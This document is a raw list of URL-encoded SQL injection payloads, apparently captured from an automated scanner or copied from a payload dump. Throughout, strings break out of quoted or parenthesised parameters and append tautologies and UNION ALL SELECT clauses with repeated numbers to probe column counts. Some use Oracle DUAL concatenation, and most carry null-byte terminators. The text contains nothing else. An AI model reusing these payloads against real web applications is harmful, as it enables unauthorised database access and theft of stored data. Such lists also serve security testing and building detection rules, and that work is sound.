-5426%29%20WHERE%203389%3D3389%20UNION%20ALL%20SELECT%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%2C%203389%00 -1858%29%20WHERE%208314%3D8314%20UNION%20ALL%20SELECT%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%2C%208314%00 -3729%27%29%20WHERE%203154%3D3154%20UNION%20ALL%20SELECT%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%2C%203154%00 -4121%27%29%20WHERE%204744%3D4744%20UNION%20ALL%20SELECT%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%2C%204744%00 -2171%27%29%20WHERE%207324%3D7324%20UNION%20ALL%20SELECT%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%2C%207324%00 -6616%27%29%20WHERE%207958%3D7958%20UNION%20ALL%20SELECT%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%2C%207958%00 -2735%27%29%20WHERE%203752%3D3752%20UNION%20ALL%20SELECT%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%00 -4654%27%29%20WHERE%208127%3D8127%20UNION%20ALL%20SELECT%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%2C%208127%00 -3126%27%29%20WHERE%205423%3D5423%20UNION%20ALL%20SELECT%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%2C%205423%00 -8989%27%29%20WHERE%203399%3D3399%20UNION%20ALL%20SELECT%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%2C%203399%00 -9320%27%29%20WHERE%206786%3D6786%20UNION%20ALL%20SELECT%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%2C%206786%00 -1236%27%29%20WHERE%201983%3D1983%20UNION%20ALL%20SELECT%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%2C%201983%00 -4391%27%20WHERE%205513%3D5513%20UNION%20ALL%20SELECT%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%2C%205513%00 -8686%27%20WHERE%207051%3D7051%20UNION%20ALL%20SELECT%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%2C%207051%00 -7125%27%20WHERE%203120%3D3120%20UNION%20ALL%20SELECT%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%2C%203120%00 -8518%27%20WHERE%207567%3D7567%20UNION%20ALL%20SELECT%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%2C%207567%00 -8749%27%20WHERE%203042%3D3042%20UNION%20ALL%20SELECT%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%2C%203042%00 -5951%27%20WHERE%202770%3D2770%20UNION%20ALL%20SELECT%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%2C%202770%00 -6243%27%20WHERE%205453%3D5453%20UNION%20ALL%20SELECT%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%2C%205453%00 -5428%27%20WHERE%204037%3D4037%20UNION%20ALL%20SELECT%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%00 -9844%27%20WHERE%205872%3D5872%20UNION%20ALL%20SELECT%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%2C%205872%00 -5818%27%20WHERE%204750%3D4750%20UNION%20ALL%20SELECT%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%2C%204750%00 -2347%22%20WHERE%203367%3D3367%20UNION%20ALL%20SELECT%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%2C%203367%00 -8349%22%20WHERE%208023%3D8023%20UNION%20ALL%20SELECT%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%2C%208023%00 -7678%22%20WHERE%201940%3D1940%20UNION%20ALL%20SELECT%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%2C%201940%00 -2067%22%20WHERE%206413%3D6413%20UNION%20ALL%20SELECT%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%2C%206413%00 -2327%22%20WHERE%202425%3D2425%20UNION%20ALL%20SELECT%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%2C%202425%00 -9457%22%20WHERE%206619%3D6619%20UNION%20ALL%20SELECT%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%2C%206619%00 -8288%22%20WHERE%207915%3D7915%20UNION%20ALL%20SELECT%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%2C%207915%00 -4886%22%20WHERE%202848%3D2848%20UNION%20ALL%20SELECT%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%2C%202848%00 -9234%22%20WHERE%205499%3D5499%20UNION%20ALL%20SELECT%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%2C%205499%00 -9378%22%20WHERE%207956%3D7956%20UNION%20ALL%20SELECT%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%2C%207956%00 -4458%27%20%7C%7C%20%28SELECT%207667%20FROM%20DUAL%20WHERE%203541%3D3541%20UNION%20ALL%20SELECT%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%2C%203541%00%20%29%20%7C%7C%20%27 -7930%27%20%7C%7C%20%28SELECT%205346%20FROM%20DUAL%20WHERE%205083%3D5083%20UNION%20ALL%20SELECT%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%2C%205083%00%20%29%20%7C%7C%20%27 -9759%27%20%7C%7C%20%28SELECT%202168%20FROM%20DUAL%20WHERE%205064%3D5064%20UNION%20ALL%20SELECT%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%2C%205064%00%20%29%20%7C%7C%20%27 -9023%27%20%7C%7C%20%28SELECT%209762%20FROM%20DUAL%20WHERE%209301%3D9301%20UNION%20ALL%20SELECT%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%2C%209301%00%20%29%20%7C%7C%20%27 -5386%27%20%7C%7C%20%28SELECT%204542%20FROM%20DUAL%20WHERE%206882%3D6882%20UNION%20ALL%20SELECT%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%2C%206882%00%20%29%20%7C%7C%20%27 -6103%27%20%7C%7C%20%28SELECT%202168%20FROM%20DUAL%20WHERE%209624%3D9624%20UNION%20ALL%20SELECT%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%2C%209624%00%20%29%20%7C%7C%20%27 -9593%27%20%7C%7C%20%28SELECT%207241%20FROM%20DUAL%20WHERE%207984%3D7984%20UNION%20ALL%20SELECT%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%2C%207984%00%20%29%20%7C%7C%20%27 -9794%27%20%7C%7C%20%28SELECT%208284%20FROM%20DUAL%20WHERE%202874%3D2874%20UNION%20ALL%20SELECT%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%00%20%29%20%7C%7C%20%27 -4172%27%20%7C%7C%20%28SELECT%209274%20FROM%20DUAL%20WHERE%203339%3D3339%20UNION%20ALL%20SELECT%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%2C%203339%00%20%29%20%7C%7C%20%27 -5689%27%20%7C%7C%20%28SELECT%203505%20FROM%20DUAL%20WHERE%201783%3D1783%20UNION%20ALL%20SELECT%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%2C%201783%00%20%29%20%7C%7C%20%27 -2636%27%20%7C%7C%20%28SELECT%201481%20WHERE%205980%3D5980%20UNION%20ALL%20SELECT%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%2C%205980%00%20%29%20%7C%7C%20%27 -7543%27%20%7C%7C%20%28SELECT%206306%20WHERE%202210%3D2210%20UNION%20ALL%20SELECT%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%2C%202210%00%20%29%20%7C%7C%20%27 -8782%27%20%7C%7C%20%28SELECT%208935%20WHERE%209018%3D9018%20UNION%20ALL%20SELECT%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%2C%209018%00%20%29%20%7C%7C%20%27 -2326%27%20%7C%7C%20%28SELECT%206524%20WHERE%205232%3D5232%20UNION%20ALL%20SELECT%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%2C%205232%00%20%29%20%7C%7C%20%27 